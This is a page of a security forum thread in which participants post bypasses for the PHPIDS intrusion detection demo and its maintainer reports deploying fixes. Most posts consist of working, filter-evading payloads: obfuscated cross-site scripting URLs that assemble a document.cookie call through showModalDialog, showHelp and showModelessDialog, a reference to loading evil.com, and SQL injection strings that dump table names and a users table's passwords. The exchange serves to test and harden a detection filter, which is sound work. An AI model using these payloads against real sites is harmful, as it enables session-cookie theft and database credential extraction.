Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...2122232425262728293031
Current Page: 31 of 31
Re: PHPIDS 0.6.5
Posted by: thornmaker
Date: June 28, 2011 02:16AM

nice work hafif :)

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: hafif
Date: June 28, 2011 10:56PM

thornmaker Wrote:
-------------------------------------------------------
> nice work hafif :)


Thanks :)

Here is one for Chrome and FF. using a popup.
http://demo.phpids.org/?test=showModalDialog%28%28/javascript/%28{a:/javascript/,b:1}.a%29%29%2b%28/:aler/%28{a:/:aler/,b:1}.a%29%29%2b%28/t.1.%2b1/%28{a:/t%281%29%2b1/,b:1}.a%29%29%29;

or you can just showModalDialog("http://evil.com"), but then you will lose the domain context (and you want it)

If popupblocker is on, it will block the script, if not the script will run.
Otherwise, clicking on the links and launching the "onclick" events, will cause script execution.

I am sure I can get it simplified... but I am to tired (it's 4 AM )



Edited 6 time(s). Last edit at 06/29/2011 06:03AM by hafif.

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: lightos
Date: June 29, 2011 01:20PM

A few bypasses in this bad boy

str'=version()
UNION#
#
#
#
SELECT group_concat(table_name)#
##
/*!FROM*/ information_schema.tables WHERE '1

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: Anonymous User
Date: July 06, 2011 09:48AM

Phew - all fixed. Sorry for the delay and thanks! The showModalDialog bypass was pretty... ironic :D

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: hafif
Date: July 06, 2011 04:26PM

:D Indeed.

The next one is an upgrade of an older bypass. I added some evasions just to prove that we have no limitation. I had a hard time generating the letter t, finally I did it:

Works on IE.
http://demo.phpids.org/?test=%0d%2ba%0d>>showHelp(a(0).a%2ba(0).nodeName%2ba(0).b%2ba(0).c%2ba(0).nodeName.toLowerCase()%2ba(0).d%2ba(0).e);%0d'1';"1"="1";a="1\"\n<t id=a a=javascrip b=:confi c=rm(documen d=.coo e=kie) >1<<1\'1'1\"1";

//Notice we lose domain context... but still it has some nice stuff.



Edited 1 time(s). Last edit at 07/06/2011 04:35PM by hafif.

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: Anonymous User
Date: August 02, 2011 11:32AM

@hafif Haha - nice, showHelp() - so some people do read the MSDN :D Sorry for the very late reply. Just deployed a fix! Thanks!

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: hafif
Date: August 21, 2011 07:52PM

.mario Wrote:
-------------------------------------------------------
> @hafif Haha - nice, showHelp() - so some people do
> read the MSDN :D Sorry for the very late reply.
> Just deployed a fix! Thanks!


:) Well I didn't. But now I did, so you might want to add showModelessDialog since it might enable information and cookie theft.
http://demo.phpids.org/?test=%0d%2ba%0d>>showModelessDialog(a(0).a%2ba(0).nodeName%2ba(0).b%2ba(0).c%2ba(0).nodeName.toLowerCase()%2ba(0).d%2ba(0).e);%0d'1';"1"="1";a="1\"\n<t%20id=a%20a=javascrip%20b=:confi%20c=rm(documen%20d=.coo%20e=kie)%20>1<<1\'1'1\"1";

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: Albino
Date: August 23, 2011 06:49AM

I was going to check the phpids site to see if you mind other people using it and what for but the site (php-ids.org/) is down :(

Also you almost definitely thought of this ages ago but using a client side filter and checking server-side to see if it's been bypassed provides a way of detecting malicious users that probably has few false positives.

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: Reiners
Date: August 23, 2011 07:20AM

@Albino: the new url is https://phpids.org/

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: DebugZer0
Date: December 13, 2011 06:46AM

any download url?

Options: ReplyQuote
Re: PHPIDS 0.6.5
Posted by: Reiners
Date: January 18, 2012 02:18PM

MySQL 5:
'||(true)#1'
'||true#'

'=true
UNION#
#
#
#original_by_lightos
SELECT \N,group_concat(password)#
##
/*!FROM*/ users WHERE '1

Options: ReplyQuote
Pages: PreviousFirst...2122232425262728293031
Current Page: 31 of 31


Sorry, only registered users may post in this forum.